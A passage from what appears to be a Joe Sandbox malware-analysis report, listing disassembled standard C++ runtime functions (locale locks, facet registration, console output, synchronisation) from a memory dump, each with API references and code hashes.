                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93A4D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93A6D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 52401a8fe9ec0831b19fe83e0a61e1dcb1a6e27c9fc68373336c27b0209665c4
                                                                      • Instruction ID: 0f0d632164b6967dbcecb467e5fa5960f2b6cad75e475c692f97a8e4431adea4
                                                                      • Opcode Fuzzy Hash: 52401a8fe9ec0831b19fe83e0a61e1dcb1a6e27c9fc68373336c27b0209665c4
                                                                      • Instruction Fuzzy Hash: 6901AD759002199BCF01EBA4D8066AD7B61EF80720F29400AE415AB391EF70DF018BB1
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87AFA
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87B04
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87B55
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87B75
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 372df5b16d12f503fc246fabbf8ed0fca2d99e93db8bee5b1a68cd138d1f1cf0
                                                                      • Instruction ID: 4fcb4e1b03b12506297e3d13950b367805426a282084b4d8a2a94422a674cc50
                                                                      • Opcode Fuzzy Hash: 372df5b16d12f503fc246fabbf8ed0fca2d99e93db8bee5b1a68cd138d1f1cf0
                                                                      • Instruction Fuzzy Hash: 6C01D675900219CBCF01FBA4D8056AE77B2EF80720F29410AF519AB391DF70DE018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93A87
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93A91
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93AE2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93B02
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: f3ecd17aeb2655f683bef1284357d9dfc21b0469eff8637ac92cf0be55c68c1b
                                                                      • Instruction ID: 4ddd00f080de999cb1c9644b6827093fb214a5ff0bcd135c54d3fded396dfde2
                                                                      • Opcode Fuzzy Hash: f3ecd17aeb2655f683bef1284357d9dfc21b0469eff8637ac92cf0be55c68c1b
                                                                      • Instruction Fuzzy Hash: 2C0180359002199BCF15FB64D8466AE7761EF84724F28450AE415AB391EF749E018BB4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87A65
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87A6F
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87AC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87AE0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 993495c9930b3be448aeb66820aa86016954d8b5fc5edbb40ee0392612b05e73
                                                                      • Instruction ID: f24fe15b0b73efc34c0eea4ac50ec20e89ec392a2c8f06599af6d1cd5b1854d5
                                                                      • Opcode Fuzzy Hash: 993495c9930b3be448aeb66820aa86016954d8b5fc5edbb40ee0392612b05e73
                                                                      • Instruction Fuzzy Hash: 03019E75904219DBCF05FB64D846AAEBB62EF84720F29450AF415AB391EF74DE01CBB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87B8F
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87B99
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87BEA
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C0A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: e4a1634688396f2864a07531367659b0cf3c4947436373e3897bbc0500463539
                                                                      • Instruction ID: 61925a4a7811edd1cd8d1097a9d3c35b3a56a4daa7be52b058145552c4e40316
                                                                      • Opcode Fuzzy Hash: e4a1634688396f2864a07531367659b0cf3c4947436373e3897bbc0500463539
                                                                      • Instruction Fuzzy Hash: E00180759002199BCF16FB64D8066AEB771EF80720F28440AE415AB392EF74DE01CBB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93CDB
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93CE5
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93D36
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93D56
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: afbf446536c960ca75ed5f3d588e06136c1474407973f34ccfd124ebbcc57860
                                                                      • Instruction ID: d2d7643825287553a45bd6f854d872dc7dc0ca87da57ed688c1e7bbf3328bf9b
                                                                      • Opcode Fuzzy Hash: afbf446536c960ca75ed5f3d588e06136c1474407973f34ccfd124ebbcc57860
                                                                      • Instruction Fuzzy Hash: A00180359002199FCF15EBA4E8566AE7761EF80720F28450AE416AB391EF749E018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93C46
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93C50
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93CA1
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93CC1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: af82a6ffedbc7f3cf13fd3ee3eb91e8c691efa0336c35e126d52c44df9a22dc3
                                                                      • Instruction ID: 5919d29b92ecdf11b20d300d6721cd4064b066419762f41c0e9253d35322832c
                                                                      • Opcode Fuzzy Hash: af82a6ffedbc7f3cf13fd3ee3eb91e8c691efa0336c35e126d52c44df9a22dc3
                                                                      • Instruction Fuzzy Hash: 5E01C035900A199BCF01EBA4D8066ADB772EF84720F28440AF415AB391EF709E018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87E78
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87E82
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87ED3
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87EF3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 66ccc9ec7cf02fe47ebb52265d471bdaa423c9a34b1e476a7dc31f0f1e56adfa
                                                                      • Instruction ID: 1a1b3c6627cb9f62545670a8c5f5ebe01af50b4213f30f5aab032205bd730d6a
                                                                      • Opcode Fuzzy Hash: 66ccc9ec7cf02fe47ebb52265d471bdaa423c9a34b1e476a7dc31f0f1e56adfa
                                                                      • Instruction Fuzzy Hash: 1901D63590121ADFCF02FBA4D8166AE7761EF80720F28444AF410A7391EF70DE018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87FA2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87FAC
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87FFD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8801D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 93798a263ca35e947ed71177739b907c2a1f5f282a74a04c9a0261b1f81d90e2
                                                                      • Instruction ID: 6f02c963777b311c4f8de1fe9ae7ba38495e321ee520da0c8d97b95970fddc4d
                                                                      • Opcode Fuzzy Hash: 93798a263ca35e947ed71177739b907c2a1f5f282a74a04c9a0261b1f81d90e2
                                                                      • Instruction Fuzzy Hash: CD01D235900219DBCF01FBA4D8566BEB7A1EF80721F28400AF411AB391EF709E019BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87F0D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87F17
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87F68
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87F88
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 9ea7381cbe76e1e79452e5674b5d1c12b4f999bb7470c5e42e09d9b60f731ed6
                                                                      • Instruction ID: d6b3c4880c5af4b7f1d3642acc32fee3ca4b3ac6e8a4c5548560365d74aec9e3
                                                                      • Opcode Fuzzy Hash: 9ea7381cbe76e1e79452e5674b5d1c12b4f999bb7470c5e42e09d9b60f731ed6
                                                                      • Instruction Fuzzy Hash: 1B01C0359402199BCB05FBA5D8066AEB762EF80720F28450AF510AB3D1EF74DE018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D85C6D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D85C78
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D85CE6
                                                                        • Part of subcall function 00D85DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D85DE0
                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00D85C93
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                      • String ID:
                                                                      • API String ID: 677527491-0
                                                                      • Opcode ID: 80e86efa995e8ff8ce2b0eab1453a6bf7f4464d9d08176e0edf6023581ab6711
                                                                      • Instruction ID: 26b77a58511075a56a087db31f74f1a35c6c8ce85e178e8dc7c4e972918709bb
                                                                      • Opcode Fuzzy Hash: 80e86efa995e8ff8ce2b0eab1453a6bf7f4464d9d08176e0edf6023581ab6711
                                                                      • Instruction Fuzzy Hash: 00017C79A01B509BDB06BB20E84557D7BA2FF85750B18400AE81297381DF78AE02DBF5
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000), ref: 00DB8C8D
                                                                      • GetLastError.KERNEL32(?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?,?,?,00DB7D0F,?), ref: 00DB8C99
                                                                        • Part of subcall function 00DB8C5F: CloseHandle.KERNEL32(FFFFFFFE,00DB8CA9,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?,?), ref: 00DB8C6F
                                                                      • ___initconout.LIBCMT ref: 00DB8CA9
                                                                        • Part of subcall function 00DB8C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DB8C50,00DB8630,?,?,00DB7788,?,?,00000000,?), ref: 00DB8C34
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00DB8643,?,00000001,?,?,?,00DB7788,?,?,00000000,?), ref: 00DB8CBE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 19b1b43c3904d348897adbebd0a32746c5f371cfd5c0c2dca247c7a68145df5f
                                                                      • Instruction ID: 961a4b6bdd4158371060993f8aa0047b040ac31a0c982f179c9827de7bdbd679
                                                                      • Opcode Fuzzy Hash: 19b1b43c3904d348897adbebd0a32746c5f371cfd5c0c2dca247c7a68145df5f
                                                                      • Instruction Fuzzy Hash: 2AF0F876501265FBCF262FD5DC049C93F6AEF487A0F144510FA1A95220DA32C920EBB1
                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,00D9789A,00000064), ref: 00D97920
                                                                      • LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D9792A
                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D9793B
                                                                      • EnterCriticalSection.KERNEL32(00DD4AF8,?,00D9789A,00000064,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D97942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: 247d017b2f3d81ae490e82e5ad8df8f65ecdc13ed9f032f8fadfae32462a0d16
                                                                      • Instruction ID: b34fbae7d7b152e4509b35189774937dc9769bf53067388c48fe879f6b9d2c9e
                                                                      • Opcode Fuzzy Hash: 247d017b2f3d81ae490e82e5ad8df8f65ecdc13ed9f032f8fadfae32462a0d16
                                                                      • Instruction Fuzzy Hash: 52E09235AC5325FBCB012B50EC08A9D3F15EF04755B054022F945A6360CBB048048BF8
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00DA712D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 0314e31c97ef427da8474aecac33324c0738f4e2f847f0a0faf5ebe29661b500
                                                                      • Instruction ID: 170380b30b94b146f72da61a4c18ec9ee8925201cefdd46e785e1f54cfe4adea
                                                                      • Opcode Fuzzy Hash: 0314e31c97ef427da8474aecac33324c0738f4e2f847f0a0faf5ebe29661b500
                                                                      • Instruction Fuzzy Hash: 14513961A0C30396CB1577A4CD4137E6BE4DB53700F288DF9E0D5822E9EB34C8959AB6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                      • API String ID: 3732870572-1956417402
                                                                      • Opcode ID: 285a729ccb77dea8bd64787266516cac09a834e10420e8c602d88a0f4674cbd9
                                                                      • Instruction ID: 6a06115d7056ba162e0070e5c33caeec6dfe73695abae5b4bfe6adc098f1ce38
                                                                      • Opcode Fuzzy Hash: 285a729ccb77dea8bd64787266516cac09a834e10420e8c602d88a0f4674cbd9
                                                                      • Instruction Fuzzy Hash: 7551D670B042595BDF259E6D88517BEBFFAEF45710F18406AF4E1D7241C274C9428B70
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D7FA3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID: false$true
                                                                      • API String ID: 118556049-2658103896
                                                                      • Opcode ID: 65e025879fda657d3264aa5630193e2e66d3929f86416dfc4bb0f52f4e112fe3
                                                                      • Instruction ID: 074e9df416605a9c07e26947b0bd5c8e80acfa9bbfd29e4b23c1c312657738eb
                                                                      • Opcode Fuzzy Hash: 65e025879fda657d3264aa5630193e2e66d3929f86416dfc4bb0f52f4e112fe3
                                                                      • Instruction Fuzzy Hash: 325176B1D003489FDB20DFA4C941BEEB7B8FF45314F14826AE849A7281E775A545CB71
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D922B1
                                                                      • _swprintf.LIBCMT ref: 00D92329
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
